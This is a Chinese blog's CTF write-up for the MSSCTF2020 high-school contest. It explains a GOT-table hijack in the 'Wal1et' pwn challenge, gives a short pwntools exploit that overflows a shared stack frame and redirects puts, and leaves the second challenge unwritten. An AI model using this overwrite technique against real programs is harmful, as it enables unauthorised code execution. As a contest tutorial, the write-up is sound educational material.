<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="信息安全,PWN,CTF,UAF," />





  <link rel="alternate" href="/atom.xml" title="arttnba3's blog" type="application/atom+xml" />






<meta name="description" content="0x00.绪论MSSCTF即全国中学生网络安全竞赛，是由西安电子科技大学举办的、面向全国中学生的信息安全竞赛，比赛为采用线上解题模式（Jeopardy）的CTF 由于今年疫情原因，比赛全程在线上开办，一心想为学校做贡献（只是想蹭饭）的我也作为志愿者参与了比赛监考的全过程（本来想出题的，但是和中学生巨犇比起来我还是太菜le 以下是我自己的赛后复盘  注：所有的题目环境都已在archive.lctf.">
<meta property="og:type" content="article">
<meta property="og:title" content="【CTF题解-0x05】MSSCTF2020-write-up-by-arttnb3">
<meta property="og:url" content="http://archive.next.arttnba3.cn/2020/09/19/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x05%E3%80%91MSSCTF2020-write-up-by-arttnb3-md/index.html">
<meta property="og:site_name" content="arttnba3&#39;s blog">
<meta property="og:description" content="0x00.绪论MSSCTF即全国中学生网络安全竞赛，是由西安电子科技大学举办的、面向全国中学生的信息安全竞赛，比赛为采用线上解题模式（Jeopardy）的CTF 由于今年疫情原因，比赛全程在线上开办，一心想为学校做贡献（只是想蹭饭）的我也作为志愿者参与了比赛监考的全过程（本来想出题的，但是和中学生巨犇比起来我还是太菜le 以下是我自己的赛后复盘  注：所有的题目环境都已在archive.lctf.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/09/20/WCOR8bqNkMHhjf4.png">
<meta property="og:image" content="https://i.loli.net/2020/09/20/Spw4rA7CvP9LIc5.png">
<meta property="og:image" content="https://i.loli.net/2020/09/20/97sjHifVQdlDPEu.png">
<meta property="og:image" content="https://i.loli.net/2020/09/20/wlXBaQ3NW9eSqus.png">
<meta property="og:image" content="https://i.loli.net/2020/09/20/TrKLWjF8ualZRcp.png">
<meta property="og:image" content="https://i.loli.net/2020/09/20/CnhPq8QiNGkZH4e.png">
<meta property="article:published_time" content="2020-09-19T11:45:24.000Z">
<meta property="article:modified_time" content="2020-09-19T19:02:05.010Z">
<meta property="article:author" content="arttnba3">
<meta property="article:tag" content="信息安全">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="UAF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/09/20/WCOR8bqNkMHhjf4.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://archive.next.arttnba3.cn/2020/09/19/【CTF题解-0x05】MSSCTF2020-write-up-by-arttnb3-md/"/>





  <title>【CTF题解-0x05】MSSCTF2020-write-up-by-arttnb3 | arttnba3's blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <a href="https://github.com/arttnba3" target="_blank" rel="noopener" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">arttnba3's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">- arttnba3的隐秘小窝 -</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://archive.next.arttnba3.cn/2020/09/19/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x05%E3%80%91MSSCTF2020-write-up-by-arttnb3-md/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="arttnba3">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="arttnba3's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">【CTF题解-0x05】MSSCTF2020-write-up-by-arttnb3</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-09-19T19:45:24+08:00">
                2020-09-19
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified&#58;</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2020-09-20T03:02:05+08:00">
                2020-09-20
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  629 字
                </span>
              

              

              
            </div>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0x00-绪论"><a href="#0x00-绪论" class="headerlink" title="0x00.绪论"></a>0x00.绪论</h1><p>MSSCTF即<strong>全国中学生网络安全竞赛</strong>，是由西安电子科技大学举办的、面向全国中学生的信息安全竞赛，比赛为采用线上<strong>解题模式</strong>（<strong>Jeopardy</strong>）的CTF</p>
<p>由于今年疫情原因，比赛全程在线上开办，一心想为学校做贡献（<del>只是想蹭饭</del>）的我也作为志愿者参与了比赛监考的全过程（<del>本来想出题的，但是和中学生巨犇比起来我还是太菜le</del></p>
<p>以下是我自己的赛后复盘</p>
<blockquote>
<p>注：所有的题目环境都已在<a href="https://archive.lctf.online" target="_blank" rel="noopener">archive.lctf.online</a>上有一份</p>
<p>以及这次mssctf只有一个人做出pwn题，而且还是ak……中学生恐怖如斯……</p>
</blockquote>
<a id="more"></a>

<h1 id="0x01-Pwn"><a href="#0x01-Pwn" class="headerlink" title="0x01.Pwn"></a>0x01.Pwn</h1><h2 id="0x00-Wal1et-got表劫持"><a href="#0x00-Wal1et-got表劫持" class="headerlink" title="0x00.Wal1et - got表劫持"></a>0x00.Wal1et - got表劫持</h2><p><a href="/download/mssctf2020/wallet/Wal1et" title="点击此处下载原题">点击下载-Wal1et</a> </p>
<p>惯例的<code>checksec</code>，发现开了NX保护和canary</p>
<p><img src="https://i.loli.net/2020/09/20/WCOR8bqNkMHhjf4.png" alt="image.png"></p>
<p>拖入IDA进行分析</p>
<p><img src="https://i.loli.net/2020/09/20/Spw4rA7CvP9LIc5.png" alt="image.png"></p>
<p>main函数中调用了<code>begin()</code>和<code>check()</code>两个函数，上图我们容易看出<strong>两函数的栈帧的基址应当相同</strong></p>
<p><img src="https://i.loli.net/2020/09/20/97sjHifVQdlDPEu.png" alt="image.png"></p>
<p>在<code>begin()</code>函数中可以读入最大108个字节，但是溢出需要至少0x78字节才能覆盖到返回地址，同时该程序也开了canary</p>
<p><img src="https://i.loli.net/2020/09/20/wlXBaQ3NW9eSqus.png" alt="image.png"></p>
<p>同样的我们可以看到在<code>check()</code>函数中使用了<code>scanf()</code>，但是没给后面的参数，考虑到可能是真的没有也可能是IDA认不出来，故尝试分析汇编代码</p>
<p><img src="https://i.loli.net/2020/09/20/TrKLWjF8ualZRcp.png" alt="image.png"></p>
<p>两次调用<code>scanf()</code>前分别将<code>v1</code>、<code>v2</code>压入栈中，即本质上是<code>scanf(&quot;%d&quot;,v1)</code>与<code>scanf(&quot;%d&quot;,v2)</code>，这里将<code>v1</code>与<code>v2</code>都当成了一个地址并尝试向上面写入数据</p>
<p>前面我们观察到这两个函数<strong>复用同一个栈空间</strong>，同时在<code>begin()</code>中所读取的字节数量足够覆写<code>check()</code>中的<code>v1</code>，故考虑将v1覆写为后面会调用到的某函数的got表地址，在第一次读入时读入一个可以获得flag的地址，这样会覆写掉got表中原函数的地址；当后面运行到那个函数时，程序会跳转到我们所输入的那个地址上，输出flag，即<strong>got表劫持</strong></p>
<p>故构造exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">e = ELF(<span class="string">'./Wal1et'</span>)</span><br><span class="line">puts_got = e.got[<span class="string">'puts'</span>]</span><br><span class="line">call_sys = <span class="number">0x08048730</span></span><br><span class="line">payload1 = <span class="string">b'a'</span>*<span class="number">104</span>+p32(puts_got)</span><br><span class="line">payload2 = str(call_sys).encode()</span><br><span class="line"></span><br><span class="line">p =process(<span class="string">'./Wal1et'</span>)<span class="comment">#remote('pwn.challenge.lctf.online',10008)</span></span><br><span class="line">p.sendline(<span class="string">b'1'</span>)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>运行脚本即可获得flag</p>
<p><img src="https://i.loli.net/2020/09/20/CnhPq8QiNGkZH4e.png" alt="image.png"></p>
<blockquote>
<p>说实话我是没想到过居然可以这么利用的，🐧yyds</p>
</blockquote>
<h2 id="0x01-fishing-master"><a href="#0x01-fishing-master" class="headerlink" title="0x01.fishing master"></a>0x01.fishing master</h2><blockquote>
<p> 先咕咕咕</p>
</blockquote>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    arttnba3
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="http://archive.next.arttnba3.cn/2020/09/19/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x05%E3%80%91MSSCTF2020-write-up-by-arttnb3-md/" title="【CTF题解-0x05】MSSCTF2020-write-up-by-arttnb3">http://archive.next.arttnba3.cn/2020/09/19/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x05%E3%80%91MSSCTF2020-write-up-by-arttnb3-md/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" <i class="fa fa-tag"></i> 信息安全</a>
          
            <a href="/tags/PWN/" <i class="fa fa-tag"></i> PWN</a>
          
            <a href="/tags/CTF/" <i class="fa fa-tag"></i> CTF</a>
          
            <a href="/tags/UAF/" <i class="fa fa-tag"></i> UAF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/09/17/%E3%80%90OJ-0x0005-Leetcode%E3%80%91%E6%A0%91%E9%83%A8%E5%88%86write-up-by-arttnba3/" rel="next" title="【OJ-0x0005-Leetcode】树部分write up by arttnba3">
                <i class="fa fa-chevron-left"></i> 【OJ-0x0005-Leetcode】树部分write up by arttnba3
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/10/02/%E3%80%90OJ-0x0006-Leetcode%E3%80%91%E5%A4%9A%E7%BA%BF%E7%A8%8B%E9%83%A8%E5%88%86write-up-by-arttnba3/" rel="prev" title="【OJ-0x0006-Leetcode】多线程部分write up by arttnba3">
                【OJ-0x0006-Leetcode】多线程部分write up by arttnba3 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  

  

        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="arttnba3" />
            
              <p class="site-author-name" itemprop="name">arttnba3</p>
              <p class="site-description motion-element" itemprop="description">- 想成为你心目中的第一啊 -</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">45</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/arttnba3" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:1543127579@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://wpa.qq.com/msgrd?v=3&uin=1543127579&site=qq&menu=yes" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/arttnba3" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://stackoverflow.com/users/13389180/arttnba3" target="_blank" title="StackOverflow">
                      
                        <i class="fa fa-fw fa-stack-overflow"></i>StackOverflow</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://plus.google.com/arttnba" target="_blank" title="Google">
                      
                        <i class="fa fa-fw fa-google"></i>Google</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Friends' Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.wootec.top" title="Reverier" target="_blank">Reverier</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://luoq1an.github.io" title="luoqian" target="_blank">luoqian</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ll1ng.github.io" title="ling" target="_blank">ling</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://shal10w.github.io" title="shallow" target="_blank">shallow</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://eqqie.cn" title="eqqie" target="_blank">eqqie</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cor1e.cn" title="cor1e" target="_blank">cor1e</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://yunq1ao.com" title="yunqiao" target="_blank">yunqiao</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://mercer5.github.io" title="mercer" target="_blank">mercer</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-绪论"><span class="nav-number">1.</span> <span class="nav-text">0x00.绪论</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-Pwn"><span class="nav-number">2.</span> <span class="nav-text">0x01.Pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-Wal1et-got表劫持"><span class="nav-number">2.1.</span> <span class="nav-text">0x00.Wal1et - got表劫持</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-fishing-master"><span class="nav-number">2.2.</span> <span class="nav-text">0x01.fishing master</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">arttnba3</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">90.1k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>





        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  <script src="/js/src/md5.min.js"></script>

   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '',
          clientSecret: '',
          repo: 'BlogComment',
          owner: '',
          admin: [''],

          id: md5(location.pathname),

          distractionFreeMode: 'false'
        })
        gitalk.render('gitalk-container')
    </script>

  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
